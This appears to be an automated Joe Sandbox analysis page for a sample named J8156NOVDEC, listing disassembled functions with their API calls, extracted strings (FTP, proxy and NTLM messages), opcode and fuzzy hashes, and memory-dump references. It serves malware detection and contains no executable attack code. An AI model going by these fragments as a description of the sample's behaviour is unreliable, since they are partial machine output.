    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: .$0123456789
    • API String ID: 88142382-4187921772
    • Opcode ID: 92c7dbd7a72b36667158a099454c9e269cb0c995fec4443c4cfe645a3c67dbbb
    • Instruction ID: 2bf6e23855e7044ab66e93a85ff840710395d2a2a24006664fd326c53aa6e394
    • Opcode Fuzzy Hash: 92c7dbd7a72b36667158a099454c9e269cb0c995fec4443c4cfe645a3c67dbbb
    • Instruction Fuzzy Hash: 66414970D04209EFDB14CFA8C8547EEBBB3AF49314F24C06ED409A7381D2795A85DB62
    Function 00687970 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00687AAD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Q$]h$]h
    • API String ID: 930174750-913105577
    • Opcode ID: 719ebf3ed4873ec307278b743f72d347bd9a485ca200ce68bcac31b3099dc4e2
    • Instruction ID: c4ffea527ee8603177d28f8133493764419a411e8608d7428a729c127d0924d2
    • Opcode Fuzzy Hash: 719ebf3ed4873ec307278b743f72d347bd9a485ca200ce68bcac31b3099dc4e2
    • Instruction Fuzzy Hash: BA419BB4D04209EFCB44DF98C585BADBBB2FB48314F2482A9D409AB351D774DE81DB84
    Function 0069F6B4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 109COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069F99D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: CWD %s$MKD %s$Server denied you to change to the given directory
    • API String ID: 930174750-1542016562
    • Opcode ID: 09c59a152abe8f31736fd99cdb5880fd9a69afea3ce8991a8fee4e76d2cd9c8d
    • Instruction ID: 24a8d9a345b9bb59f108adbe8fa76fa325e3b174f8e8f479df21c4591b030419
    • Opcode Fuzzy Hash: 09c59a152abe8f31736fd99cdb5880fd9a69afea3ce8991a8fee4e76d2cd9c8d
    • Instruction Fuzzy Hash: FA4161B8E00109DFDB04DF94D595AEEB3BAEF44304F218069E8059B752D739EE82DB90
    Function 006E02BD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006E0066: GetOEMCP.KERNEL32(00000000,006E02D8,?,al%08X,?,?,006C610D,58383025,00000000), ref: 006E0091
    • _free.LIBCMT ref: 006E0335
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free
    • String ID: al%08X$%08X
    • API String ID: 269201875-2095630812
    • Opcode ID: ee8eb9b84b8860df6eb3dfc3a998766b12235b02eb214e1db5b524f087154d5a
    • Instruction ID: 8672b0656b4cb0c8f456217a959947d95abf4f961d745bd34c7d1075398d0efa
    • Opcode Fuzzy Hash: ee8eb9b84b8860df6eb3dfc3a998766b12235b02eb214e1db5b524f087154d5a
    • Instruction Fuzzy Hash: 1531B27180138AAFDB11DF59D884ADE77E6EF44310F10405AF9209B3A1EB769D91CF50
    Function 00676460 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067658F
      • Part of subcall function 00670630: _strlen.LIBCMT ref: 0067067A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: PROXY %s %s %s %li %li$TCP4$TCP6
    • API String ID: 1951014933-1242256665
    • Opcode ID: ecd36fbfc4c48942349307bbc8ba3645b72af0187a2205983a69887c449f1de1
    • Instruction ID: 4211f1b89fdcc82cfac33d780c6b698dde20f8664ce3fd127d7239911cc251db
    • Opcode Fuzzy Hash: ecd36fbfc4c48942349307bbc8ba3645b72af0187a2205983a69887c449f1de1
    • Instruction Fuzzy Hash: C9316075A00208EFEB54DF68DC41FE973BAAF49300F00C5A9F54D97255D670AA84CFA5
    Function 0069E440 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069E538
      • Part of subcall function 006621C0: _strlen.LIBCMT ref: 006621E6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: Accept-ranges: bytes$Couldn't use REST$RETR %s
    • API String ID: 1951014933-2207554236
    • Opcode ID: 865eb3ab4a1bd153c308a356dadbd77ae0d66dbd70abb61edb5a1c811ba96f22
    • Instruction ID: 6de26a795ed95f52c1ee21510ab29692b1803296b1ef91d733d6bd6fb4a9e2b3
    • Opcode Fuzzy Hash: 865eb3ab4a1bd153c308a356dadbd77ae0d66dbd70abb61edb5a1c811ba96f22
    • Instruction Fuzzy Hash: 6431A8B5E10208EFDF04DF98D841BEDBBBAEB44304F008469F9056B341D776AA85CB91
    Function 0067E370 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 93COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067E47B
      • Part of subcall function 0067E290: @_RTC_CheckStackVars@8.LIBCMT ref: 0067E340
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: +$p$p
    • API String ID: 930174750-4263630744
    • Opcode ID: aaae5fd3bb58cdf904cccc243fca0be626ee58d44ec6837ec0992cd081e2270a
    • Instruction ID: e6af99961d3dca9d27ff6159e0259a098d5a23ab0875fdf006823ef5b052b1a1
    • Opcode Fuzzy Hash: aaae5fd3bb58cdf904cccc243fca0be626ee58d44ec6837ec0992cd081e2270a
    • Instruction Fuzzy Hash: 5D3180759042489FCB14CF68D8407EDBBB2FB49314F10C1E9E81D9B346C636AA99CF40
    Function 00671310 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0067137D
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    • _strlen.LIBCMT ref: 006713E5
    Strings
    • Malformatted trailing header ! Skipping trailer., xrefs: 006713C5
    • %s%s, xrefs: 006713A4
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8___from_strstr_to_strchr
    • String ID: %s%s$Malformatted trailing header ! Skipping trailer.
    • API String ID: 119698547-1371318721
    • Opcode ID: a743d2911a7a001c4a5b1aced9f01dce440a7f777b45b9ceff54caa3ef1fb91d
    • Instruction ID: faa035c584b6044188fb3930a263f3a2730c7565bee8fda694f4bdfe061a1b3e
    • Opcode Fuzzy Hash: a743d2911a7a001c4a5b1aced9f01dce440a7f777b45b9ceff54caa3ef1fb91d
    • Instruction Fuzzy Hash: 7D310AB0E0020CAFDB40DFA8C895BAEBBB6AF45315F14C5A9E4189B341D3B59A44CB91
    Function 006353C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
    Download Yara Rule
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 006353ED
    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0063543C
      • Part of subcall function 006BDD10: _Yarn.LIBCPMT ref: 006BDD2F
      • Part of subcall function 006BDD10: _Yarn.LIBCPMT ref: 006BDD53
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0063546E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
    • String ID: bad locale name
    • API String ID: 3628047217-1405518554
    • Opcode ID: 8aa41c4610fd161f6f8478dc9b98376596b43478bd24f0653b33be44a100e8fa
    • Instruction ID: cc1eee98139123440c860ed23896efdb2fc21f7bd6da36c23c6d2dc17001da3c
    • Opcode Fuzzy Hash: 8aa41c4610fd161f6f8478dc9b98376596b43478bd24f0653b33be44a100e8fa
    • Instruction Fuzzy Hash: A811B271904B849FD360DF69C801B9BBBF8EF18710F008A1EE499D7B81E775A508CB95
    Function 006E34F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID: hhm
    • API String ID: 0-664977344
    • Opcode ID: bffee99ac77b83d9daa236bad6bcf9c5e99345cf74b5b89e3b3cbf6e0327e620
    • Instruction ID: 0048decb4e82ce399f0b40f3213ca6e5911eca35c3cc9629dc43296604908bbc
    • Opcode Fuzzy Hash: bffee99ac77b83d9daa236bad6bcf9c5e99345cf74b5b89e3b3cbf6e0327e620
    • Instruction Fuzzy Hash: B811B1B06113589FD745BFEA8D4ABED77A6DF08724F10004CF5018B381EB748A41D766
    Function 006AED40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66COMMON
    Download Yara Rule
    APIs
    • _strlen.LIBCMT ref: 006AED79
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006AEDEF
      • Part of subcall function 00683DA0: _strlen.LIBCMT ref: 00683DF9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: NTLM handshake failure (empty type-2 message)$ONj
    • API String ID: 3286693010-3125385695
    • Opcode ID: 99f7d923c5a7ac6dcfd472b1f7d24f68aec300f2bb1de603b7fc05c03a5c711f
    • Instruction ID: 4be43e63f176aca0bd8704e55c73e88580a0d1113d264f92999adab8cf397d18
    • Opcode Fuzzy Hash: 99f7d923c5a7ac6dcfd472b1f7d24f68aec300f2bb1de603b7fc05c03a5c711f
    • Instruction Fuzzy Hash: C9211DB5D00208EFCB40EF98D545BEEBBB6AF45304F10856AE81897351E7759B44CF91
    Function 006E627D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
    Download Yara Rule
    APIs
    • SetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 006E62E8
    • _free.LIBCMT ref: 006E62F7
    • _free.LIBCMT ref: 006E6306
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$EnvironmentVariable
    • String ID: n
    • API String ID: 1464849758-2683921290
    • Opcode ID: 06d155fe66bfedac89943184636ddf8cf6fbea188e44d1f3d13873fb816cebe4
    • Instruction ID: 64d31b817dd6c795ad31c5b3ff29dea370171e51b0d67988cebd4fb0135026c1
    • Opcode Fuzzy Hash: 06d155fe66bfedac89943184636ddf8cf6fbea188e44d1f3d13873fb816cebe4
    • Instruction Fuzzy Hash: DB116D71C01259AEDF01AFAAD981AEEFFBABF18350F14407EE814B3211D6304A44CB94
    Function 006AA2C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58libraryloaderCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00666890: GetModuleHandleA.KERNEL32(kernel32), ref: 006668C9
    • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 006AA334
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
    • API String ID: 1646373207-3788156360
    • Opcode ID: ce0589064e6a80ebaaa3a056775d03a13d624a38a159054b84d8868a480cf84e
    • Instruction ID: 85c5419e329bb8b6e8c5bd165df150d6489c3efdc861ad0cc4876a1514230558
    • Opcode Fuzzy Hash: ce0589064e6a80ebaaa3a056775d03a13d624a38a159054b84d8868a480cf84e
    • Instruction Fuzzy Hash: 83113DB1D04254EADA50BBA9EC07B5936A69702304F40C26AA4059B2D2EB7C5E81CB97
    Function 00641A20 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49registryCOMMON
    Download Yara Rule
    APIs
    • RegisterEventSourceW.ADVAPI32(00000000,?), ref: 00641A5C
    • ReportEventW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00641A93
    • DeregisterEventSource.ADVAPI32(00000000), ref: 00641A9A
    Strings
    • %s failed w/err 0x%08lx, xrefs: 00641A3E
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Event$Source$DeregisterRegisterReport
    • String ID: %s failed w/err 0x%08lx
    • API String ID: 3235303502-1417036776
    • Opcode ID: 99f30e87072fb907410950665a1de630cf24eecf4663fb8c0abc97cd75084fad
    • Instruction ID: a52892e80b1fe102cf2c728c9c5385bfea5c0d17e446faf3e71354a625f93bf7
    • Opcode Fuzzy Hash: 99f30e87072fb907410950665a1de630cf24eecf4663fb8c0abc97cd75084fad
    • Instruction Fuzzy Hash: 48019271A41318BFDB20EF54CD4AFDAB769EB04710F004195FA08AB280DAB0AA84CB94
    Function 006D93CB Relevance: 6.3, APIs: 4, Instructions: 320COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strrchr
    • String ID:
    • API String ID: 3213747228-0
    • Opcode ID: 3b05e0997ff22381ed1a2b7edc12014e15a3e93f77352b2339b1cc4bab82f9cd
    • Instruction ID: 0d68da233a7b1d8c110839b50fee53148b9c040bf70453700dd0049f2357af3f
    • Opcode Fuzzy Hash: 3b05e0997ff22381ed1a2b7edc12014e15a3e93f77352b2339b1cc4bab82f9cd
    • Instruction Fuzzy Hash: FFB10232E052859FEB158F68C891BEEBBE6EF55340F1481ABE8459B342D634DD02CB74
    Function 0067D6D0 Relevance: 6.2, APIs: 4, Instructions: 221COMMON
    Download Yara Rule
    APIs
    • getaddrinfo.WS2_32(?,?,?,?), ref: 0067D720
    • freeaddrinfo.WS2_32(00000000), ref: 0067D91A
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067D977
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8freeaddrinfogetaddrinfo
    • String ID:
    • API String ID: 70213910-0
    • Opcode ID: 769d90e7279dfdeea3826775b4b63f411f5b4c3c8b502a143690d4d6b190e10d
    • Instruction ID: 6c9bc764d617e157d03cf198fef18978597cf2bef5328f366028670fde959c7f
    • Opcode Fuzzy Hash: 769d90e7279dfdeea3826775b4b63f411f5b4c3c8b502a143690d4d6b190e10d
    • Instruction Fuzzy Hash: C8A1F6B4D00209DFCB58DF98D585BEEB7B2BF48300F208599D81967351D739AE82CBA5
    Function 006E3683 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 006E3753
    • _free.LIBCMT ref: 006E377C
    • SetEndOfFile.KERNEL32(00000000,006D8568,00000000,?,?,?,?,?,?,?,?,006D8568,?,00000000), ref: 006E37AE
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,006D8568,?,00000000,?,?,?,?,00000000,?), ref: 006E37CA
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$ErrorFileLast
    • String ID:
    • API String ID: 1547350101-0
    • Opcode ID: 71e90d6587e80cbe1f5550f08fb663f48bbe48803b0f7c8700208acbad8c0860
    • Instruction ID: 6b374f143e6b2a6da4e72f01b732561319d5fbf5bd98d309a40f60cadb7271cc
    • Opcode Fuzzy Hash: 71e90d6587e80cbe1f5550f08fb663f48bbe48803b0f7c8700208acbad8c0860
    • Instruction Fuzzy Hash: 1C4126F2901395ABCF106BB6CC4AB9E77A7EF44320F140109F414A7391EB30CE508B69
    Function 00650AC0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen
    • String ID:
    • API String ID: 4218353326-0
    • Opcode ID: 2c420e936858e49e510fb2bc624808625fed5656cc878ce2a03c7dd258d3e1a3
    • Instruction ID: 75c3706f4ca5280adf1d1bd25780417f1813e2b68b0f51e773649baad12c5dba
    • Opcode Fuzzy Hash: 2c420e936858e49e510fb2bc624808625fed5656cc878ce2a03c7dd258d3e1a3
    • Instruction Fuzzy Hash: 0341C2B0D04248EFDF10DFA8D8957EEBBB7AF06305F1441A8D81567202D635DB49CB92
    Function 00652250 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
    Download Yara Rule
    APIs
    • EnterCriticalSection.KERNEL32(?,?,0065AF71,?,0065B415,00000000), ref: 006522A2
    • Microsoft::WRL::Wrappers::HandleTraits::SRWLockExclusiveTraits::Unlock.VCCORLIBD ref: 006522E4
      • Part of subcall function 0067E1E0: CloseHandle.KERNEL32(?,?,?,0067E263), ref: 0067E1EA
    • closesocket.WS2_32(?), ref: 00652348
    • LeaveCriticalSection.KERNEL32(?,?,0065AF71,?,0065B415,00000000), ref: 006522CB
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
